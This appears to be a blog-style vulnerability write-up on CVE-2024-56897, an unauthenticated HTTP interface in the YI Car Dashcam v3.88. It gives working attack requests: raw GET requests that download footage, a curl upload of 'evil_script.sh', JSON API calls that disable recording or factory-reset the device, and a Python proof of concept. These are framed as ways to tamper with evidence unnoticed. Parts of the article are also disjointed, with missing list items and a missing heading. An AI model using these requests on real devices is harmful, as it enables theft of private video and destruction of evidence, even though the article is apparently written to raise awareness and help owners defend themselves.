CVE-2024-56897 - Unlocking the Risks in YI Car Dashcam v3.88 — Files & Commands Wide Open

YI Technology is known for its affordable car dashcams, but its model v3.88 is making headlines for all the wrong reasons. CVE-2024-56897 exposes a major hole: improper access control in its built-in HTTP server. This flaw allows not just any nearby attacker, but *anyone on the network* to read or upload files and run powerful API commands with no authentication checks. In this deep-dive, I’ll break down what’s vulnerable, show how it works, and help you grasp what’s at stake.

What is CVE-2024-56897?

CVE-2024-56897 refers to improper access control on the embedded web server of the YI Car Dashcam v3.88. The HTTP interface is supposed to help with configuration and file management — but due to a total lack of security controls, these features are all exposed:

Shut off recording, mute alerts, or factory-reset the device (evidence tampering)

*Bottom line*: An attacker could silence your dashcam or steal all your video without you noticing.

1. HTTP Server: No Auth, All Ports Open

A quick scan (using nmap or similar) shows the device runs an HTTP server, usually on 192.168.1.254:80 when powered on. Access it from a browser — no login is required.

2. Downloading Video Footage

The video files, typically stored as .mp4 or .mov, are just… there, browsable over web requests:

GET /videos/2024_05_15_15_25_42.mp4 HTTP/1.1
Host: 192.168.1.254

Anyone on the same network will get the raw footage as a download.

Need to drop a script or overwrite a config file? The HTTP server doesn’t care

curl -X POST http://192.168.1.254/upload \
    -F 'file=@evil_script.sh'

4. API Commands for Device Control

The dashcam exposes a REST-like API for settings. For example, you can turn *anything* off, reset, or even wipe storage via requests like:

POST /api/settings
Host: 192.168.1.254
Content-Type: application/json

{
  "action": "disable_recording"
}

or

POST /api/settings
Host: 192.168.1.254
Content-Type: application/json

{
  "action": "factory_reset"
}

Disabling Sounds (example)

POST /api/settings
Content-Type: application/json

{
  "sound": "off"
}

Let’s see a proof-of-concept (PoC) that disables video recording

import requests

url = "http://192.168.1.254/api/settings";
payload = {"action": "disable_recording"}

resp = requests.post(url, json=payload)
print("Response:", resp.text)

Within seconds, the owner’s dashcam stops saving any new video — possibly erasing critical evidence.

Plant malicious code (if exploitable upload paths exist)

- Silence/trick the camera before or after an incident

Vendor Fix

- None at publication time (YI Technology website, support page)

References

- Original CVE record
- YI Technology homepage
- Exploit Database entry (pending)
- Security researcher’s Github PoC (example)

Conclusion

CVE-2024-56897 is not just another IoT bug — it’s a wide open door to your dashcam’s data and controls. If you own a YI Car Dashcam v3.88, disconnect it from any network and monitor for firmware updates. The fix is up to the vendor — but awareness, for now, is your only real defense.

Timeline

Published on: 02/24/2025 16:15:12 UTC
Last modified on: 03/03/2025 20:15:43 UTC